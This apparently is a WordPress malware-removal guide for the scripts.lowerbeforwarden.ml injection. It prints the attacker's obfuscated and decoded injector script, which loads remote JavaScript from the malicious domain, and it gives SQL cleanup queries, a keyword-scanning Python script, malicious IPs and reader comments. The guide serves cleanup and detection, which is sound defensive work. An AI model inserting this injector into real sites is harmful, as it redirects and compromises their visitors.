scripts.lowerbeforwarden.ml is a newer version of the js.donatelloflowfirstly.ga virus, and it is infecting all those sites that have not yet fixed the backdoor.
js.donatelloflowfirstly.ga is a very severe malware-injection type of virus, and thousands of WordPress sites are infected with it.
This guide is now old, check out a new one here
Index
How to Check For scripts.lowerbeforwarden.ml
How to Check For location.lowerbeforwarden.ml
If your site redirects visitors to some ugly-looking webpages, this virus may exist on your site.
You might find the following scripts embedded everywhere in your site:
<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>
or
<script src='https://location.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>
Yes, that is one of the scripts that this virus inserts.
Here is the encoded version of the scripts.lowerbeforwarden.ml virus script, which hides its strings behind String.fromCharCode character codes:
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script></head>
Here is the decoded script:
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement('script'); elem.type = 'text/javascript'; elem.src = 'https://scripts.lowerbeforwarden.ml/src.js';elem.appendAfter(document.getElementsByTagName('script')[0]);elem.appendAfter(document.getElementsByTagName('head')[0]);document.getElementsByTagName('head')[0].appendChild(elem);})();</script></head>
How to clean scripts.lowerbeforwarden.ml virus
Create a backup of your whole site, including the database, before changing any code.
1. First, delete the _a, _f, _2, etc. files from your site's home directory.
2. Delete any malicious code you spot in the mu-plugins folder.
Check all the files under wp-content/mu-plugins for anything suspicious and delete it. While cleaning this infection for a user, I saw that he was using nulled WordPress plugins. The additional functionality added to the nulled plugin, in rms-script-ini.php, creates another file under wp-content/mu-plugins, i.e. rms_unique_wp_mu_pl_fl_nm.php, which creates a communication channel between the hacker's site and your website. By completing this step you will have cleaned up the remaining traces of the vulnerability.

3. Go to phpMyAdmin. Click on the database and run the following SQL query to remove the scripts from the wp_posts table:

UPDATE wp_posts SET post_content = REPLACE(post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", "");
or
UPDATE wp_posts SET post_content = REPLACE(post_content, "<script src='https://location.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", "");
If you want any more help removing this virus, you can mail me at [email protected]
Clean Core Files
There are many ways to clean your WordPress files. Here is my way:
1): Zip all the site files and download the zip file to your desktop.
2): Unzip the files to a folder, "txnkaro" as an example.
3): Go to the folder wp-content/plugins and delete all plugins, then put clean copies of the plugins into the folder. Do the same with the theme files: delete all themes and replace them with clean themes.
4): Now run the VSCode editor; you can download it at https://code.visualstudio.com/ and install it.
5): Open the txnkaro (example) folder in VSCode, then click Edit > Search in the files to search for the keywords: donatelloflowfirstly, lowerbeforwarden. Only a few files should be found, since we have deleted all cached files and replaced all themes and plugins. Edit those files if you know how to, or just replace them with clean files.
6): All files should be clean now. Delete your whole site and upload this clean backup to the site folder. Your site should be OK.
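The keyword search in step 5 only finds the domain where it is written out literally; the encoded script shown earlier stores it as String.fromCharCode numbers, so a plain text search passes over it. The Python sketch below is an added example, not part of the original guide: it decodes those calls first and then looks for the same two keywords. The function names and the list of file extensions are assumptions.

```python
import re
import sys
from pathlib import Path

KEYWORDS = ("donatelloflowfirstly", "lowerbeforwarden")  # from step 5
# Matches String.fromCharCode(115,99,...) as used in the encoded script.
CHAR_CODES = re.compile(r"String\.fromCharCode\(([\d\s,]+)\)")
SCAN_SUFFIXES = {".php", ".js", ".html", ".htm"}  # assumption: adjust as needed
# Excerpt of the encoded script shown earlier on this page.
SAMPLE = ("elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,"
          "114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,"
          "97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);")


def decode_char_codes(text):
    """Replace each String.fromCharCode(...) call with the string it builds."""
    def build(match):
        try:
            return "".join(chr(int(n)) for n in match.group(1).split(",") if n.strip())
        except (ValueError, OverflowError):
            return match.group(0)  # not valid character codes: keep as-is
    return CHAR_CODES.sub(build, text)


def find_keywords(text):
    """Map each keyword found to 'plain' (literal) or 'encoded' (char codes)."""
    plain, decoded = text.lower(), decode_char_codes(text).lower()
    hits = {}
    for kw in KEYWORDS:
        if kw in plain:
            hits[kw] = "plain"
        elif kw in decoded:
            hits[kw] = "encoded"
    return hits


def scan_tree(root):
    """Return [(relative path, hits)] for matching files under root."""
    found = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = find_keywords(path.read_text(errors="replace"))
            if hits:
                found.append((str(path.relative_to(root)), hits))
    return found


if __name__ == "__main__":
    print(scan_tree(sys.argv[1]) if len(sys.argv) > 1 else find_keywords(SAMPLE))
```

Run it with the unzipped folder as its argument (for example the txnkaro folder from step 2); files reported as "encoded" are the ones the editor search would not have shown.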
There is another way to clean the files if you can log in to the site admin panel. Install the Wordfence plugin and scan the whole site. Wordfence will find the injected files; just edit them or replace them with clean files.
Now clear your website cache files and your browser cache and check; the virus should be gone.
If you are looking for a professional who can help remove viruses permanently from your website, check out my gig on Fiverr.
List of malicious URLs:
Other malicious domains within the same network:
Malicious IPs: 45.9.148.126, 157.245.79.75.
Thanks for the info. One thing this virus does is that wp-login.php and wp-admin show a 500 error. I got my website fixed but I can’t log in.
Thank you for this article. It was very helpful in resolving my issue with scripts.lowerbeforwarden.ml. I had to check my wp_posts to get the syntax of the script, as my script was slightly different from your version.